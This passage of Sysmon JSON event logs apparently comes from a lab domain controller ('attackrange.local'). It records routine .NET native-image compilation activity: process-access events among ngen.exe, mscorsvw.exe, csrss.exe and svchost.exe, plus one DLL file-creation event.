Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8528,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:19.123\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1354-5F25-0000-0010733C0E00}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:19.123","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1354-5F25-0000-0010733C0E00}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8529,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:19.123\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1354-5F25-0000-0010733C0E00}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:19.123","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1354-5F25-0000-0010733C0E00}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8530,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:19.123\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1354-5F25-0000-0010733C0E00}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:19.123","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1354-5F25-0000-0010733C0E00}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8531,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:19.341\r\nProcessGuid: {E2A3D6B1-137B-5F25-0000-001021750F00}\r\nProcessId: 4848\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12f0-0\\System.Runtime.Serialization.Formatters.Soap.dll\r\nCreationUtcTime: 2020-08-01 07:02:19.341","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:19.341","ProcessGuid":"{E2A3D6B1-137B-5F25-0000-001021750F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12f0-0\\System.Runtime.Serialization.Formatters.Soap.dll","CreationUtcTime":"2020-08-01 07:02:19.341","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8532,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:19.373\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-0010E87F0D00}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:19.373","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-0010E87F0D00}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8533,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:19.373\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-0010E87F0D00}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:19.373","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-0010E87F0D00}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8534,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:19.388\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-137B-5F25-0000-001083780F00}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:19.388","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-137B-5F25-0000-001083780F00}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8535,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:19.419\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137B-5F25-0000-00109D7B0F00}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:19.419","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137B-5F25-0000-00109D7B0F00}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8536,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:19.419\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137B-5F25-0000-00109D7B0F00}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 